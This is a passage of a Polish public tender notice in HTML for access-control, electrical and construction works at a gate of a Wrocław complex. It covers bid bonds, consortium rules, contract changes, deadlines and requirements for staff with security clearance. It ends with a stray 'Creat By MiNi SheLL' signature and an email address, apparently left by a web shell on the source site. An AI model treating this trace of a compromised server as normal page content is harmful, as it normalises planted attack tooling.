informacje</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do postępowania, Wykonawca ma obowiązek wnieść wadium w wysokości 5 000,00 zł (pięć tysiący złotych 00/100);<br/>2.	Wykonawca może wnieść wadium w jednej lub kilku następujących formach: <br/>1)	w pieniądzu, <br/>2)	w gwarancjach bankowych, <br/>3)	w gwarancjach ubezpieczeniowych, <br/>4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium musi być złożone lub wpłynąć na rachunek Zamawiającego przez upływem terminu składania ofert.<br/>4.	Wykonawca zobowiązany jest wnieść wadium, co najmniej na okres związania ofertą.<br/>5.	Wadium wnoszone w formie pieniężnej należy wpłacać na rachunek Zamawiającego w Banku PKO SA O Krotoszyn nr 68 1240 6292 1111 0010 3708 7291, z adnotacją: „Wadium - SVA/Z/K/4620-2/2022: Wykonanie robót branży teletechnicznej, elektrycznej i budowlanej w ramach przebudowy bramy nr 3 i Systemu Kontroli Dostępu - etap 1 przebudowy ogrodzenia kompleksów 2836 8658 i 2900 w CSWIiCh we Wrocławiu”, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku Zamawiającego. Kopię dokumentu potwierdzającego dokonanie przelewu pieniężnego Wykonawca winien dołączyć do oferty. <br/>6.	W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach (formie niepieniężnej), o których mowa w ust. 2 pkt 2-4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7.	Wadium powinno być oznaczone w następujący sposób: WADIUM – nr zamówienia – nazwa postępowania lub w inny sposób umożliwiający identyfikację postępowania, którego dotyczy.<br/>8.	Wadium wnoszone w formach innych niż w pieniądzu, winno gwarantować Zamawiającemu wypłatę pełnej kwoty wadium, w przypadku zaistnienia okoliczności wskazanych w art. 98 ust. 6 ustawy, bezwarunkowo i nieodwołalnie, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą.<br/>9.	Niedopuszczalne jest wprowadzanie jakichkolwiek warunków ograniczających Zamawiającemu wypłacenie wadium. <br/>10.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w<br/>zakresie wskazanym w załącznikach nr 2 i nr 3 do SWZ składa każdy z Wykonawców wspólnie<br/>ubiegający się o zamówienie. Oświadczenia te mają potwierdzać brak podstaw wykluczenia.<br/>2. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, Zamawiający zastrzega sobie prawo żądania, przed podpisaniem<br/>umowy w sprawie udzielenia zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców poświadczoną ”za zgodność z oryginałem”. Umowa taka zaleca się aby zawierała:<br/>oznaczenie stron umowy, cel i sposób współdziałania, zakres prac przewidzianych do<br/>wykonania przez każdego z Wykonawców, solidarną odpowiedzialność za wykonanie<br/>zamówienia, oznaczenie czasu trwania konsorcjum (obejmujący okres realizacji przedmiotu<br/>zamówienia, gwarancji, rękojmi).<br/>3. Zamawiający żąda od Wykonawcy złożenia wraz z ofertą pełnomocnictwa lub umocowania,<br/>udzielonego osobie/osobom podpisującej/podpisującym ofertę, o ile prawo do reprezentowania<br/>Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.<br/>4. W przypadku, kiedy Wykonawcy wspólnie ubiegają się o zamówienie, wówczas mają<br/>obowiązek ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przedmiotowe pełnomocnictwo należy załączyć do oferty.<br/>5.	W przypadku, o którym mowa w art. 117 ust. 3 ustawy, Wykonawcy wspólnie ubiegający się o zamówienie do oferty składają oświadczenie, z którego wynika, które roboty budowlane, wykonają poszczególni Wykonawcy. W sytuacji nie wpisania informacji, o których mowa powyżej Zamawiający na podstawie art. 128 ustawy odpowiednio wezwie Wykonawców do uzupełnienia lub wyjaśnienia treści oświadczenia w wyznaczonym terminie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z art. 455 ust. 1 pkt 1 ustawy Zamawiający przewiduje możliwość zmiany umowy w przypadku:<br/>1)	działania siły działania siły wyższej, mającej bezpośredni wpływ na termin wykonania robót (np. klęski żywiołowe, strajki) lub występowania niekorzystnych warunków atmosferycznych (opady, niska temperatura itp.) uniemożliwiających wykonywanie robót w takim stopniu, że termin wykonania może być zagrożony – Zamawiający dopuszcza możliwość czasowego zawieszenia wykonywania Umowy lub jej części lub zmianę terminu realizacji Umowy (w tym w szczególności zmiany harmonogramu rzeczowo – finansowego) o czas działania siły wyższej lub czas potrzebny do usunięcia jej działania lub usunięcia przeszkód,<br/>2)	wystąpienia zmiany w dokumentacji projektowej na skutek stwierdzenia błędów projektowych lub zmiany powszechnie obowiązujących przepisów prawa, Polskich Norm lub innych dokumentów normalizacyjnych, w tym norm obronnych oraz zmian przeznaczenia obiektu lub funkcji pomieszczeń – Zamawiający dopuszcza możliwość:<br/>a. zmiany terminu realizacji przedmiotu zamówienia ( w tym w szczególności zmiany harmonogramu rzeczowo – finansowego) o okres niezbędny dla zakończenia robót na podstawie zmienionej dokumentacji projektowej, <br/>b.	zmiany materiałów, urządzeń lub zmianę technologii w taki sposób, aby możliwe było zakończenie realizowanej inwestycji zgodnie z obowiązującymi przepisami prawa oraz ze sztuką budowlaną – po uzyskaniu zgody Inwestora i akceptacji projektanta dla rozwiązań zamiennych i zaakceptowaniu przez Zamawiającego dokumentacji i kosztorysów, nie powodujących rozszerzenia przedmiotu zamówienia, <br/>c.	zmiany wynagrodzenia umownego polegającej na zwiększeniu lub zmniejszeniu wynagrodzenia na skutek zmian w dokumentacji projektowej o 50% wartości pierwotnej Umowy,<br/>3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie zmiany przepisów dotyczących podatku od towarów i usług – Zamawiający dopuszcza możliwość zmiany wynagrodzenia umownego w zakresie podatku. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pomocą Platformy zakupowej www.amwsinevia.eb2b.com.pl w zakładce załączniki przedmiotowego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. SEKCJI 5.7)<br/>3.4 co najmniej trzy (3) osoby skierowane do realizacji zamówienia tj. posiadających (każdy z nich z osobna): zaświadczenie o wpisie na listę kwalifikowanego pracownika zabezpieczenia technicznego wraz z legitymacją kwalifikowanego pracownika zabezpieczenia technicznego, świadectwo ukończenia kursów w zakresie instalowania i konserwacji systemów technicznych stopni 1-4 klas SA1-SA4, świadectwo kwalifikacyjne E (eksploatacja), ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej, a także aktualne zaświadczenie o odbytym przeszkoleniu z zakresu ochrony informacji niejawnych, a ponadto co najmniej jeden z powyższych instalatorów musi posiadać świadectwo ukończenia kursu w zakresie projektowania systemów zabezpieczeń technicznych stopni 1-4 klas SA1-SA4 oraz co najmniej jeden z powyższych instalatorów musi posiadać świadectwo kwalifikacyjne D (dozór);<br/>3.5 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia pełniącą funkcję Kierownika Jednostki Organizacyjnej zgodnie z art. 2 ust.14 ustawy z dn. 05.08.2010 o ochronie informacji niejawnych; <br/>3.6 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia pełniącą funkcję Pełnomocnika ds. Ochrony Informacji Niejawnych na zasadach określonych w art. 15 Ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2019 r. poz. 742), posiadającą aktualne poświadczenie bezpieczeństwa dopuszczające do dostępu do informacji niejawnych o klauzuli co najmniej „POUFNE” oraz aktualne zaświadczenie potwierdzające odbycie szkolenia dla pełnomocników ochrony i ich zastępców oraz kandydatów na pełnomocników ochrony lub ich zastępców, przeprowadzone przez ABW lub SKW;<br/>3.7 co najmniej jedną (1) osobę skierowaną do realizacji zamówienia pełniącą funkcję Kierownika kancelarii tajnej lub Kierownik komórki organizacyjnej innej niż kancelaria tajna (kierownik punktu ewidencyjnego) posiadającą ważne poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych lub ważne upoważnienie do dostępu do informacji niejawnych o klauzuli ZASTRZEŻONE wydane przez Kierownika Jednostki Organizacyjnej oraz aktualne zaświadczenie stwierdzające odbycie przeszkolenia w zakresie ochrony informacji niejawnych;<br/>wraz z podaniem informacji na temat ich uprawnień (numer, rodzaj i zakres), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wzór wykazu osób stanowi załącznik nr 6 do SWZ.<br/>4)	posiada lub dysponuje (w przypadku umowy z podwykonawcą): kancelarią tajną lub kancelarią inną niż kancelaria tajna przygotowaną do przechowywania informacji niejawnych o klauzuli ZASTRZEŻONE wraz z informacją o podstawie do dysponowania tymi zasobami – wzór wykazu stanowi załącznik nr 10 do SWZ.<br/><br/>Zamawiający informuje, że w odniesieniu do przedmiotowego zamówienia pozostaje on generalnym wykonawcą w rozumieniu przepisów kodeksu cywilnego. Nazewnictwo użyte w SWZ oraz w załącznikach (Wykonawca, Zamawiający) jest stosowane jedynie w odniesieniu do przepisów ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com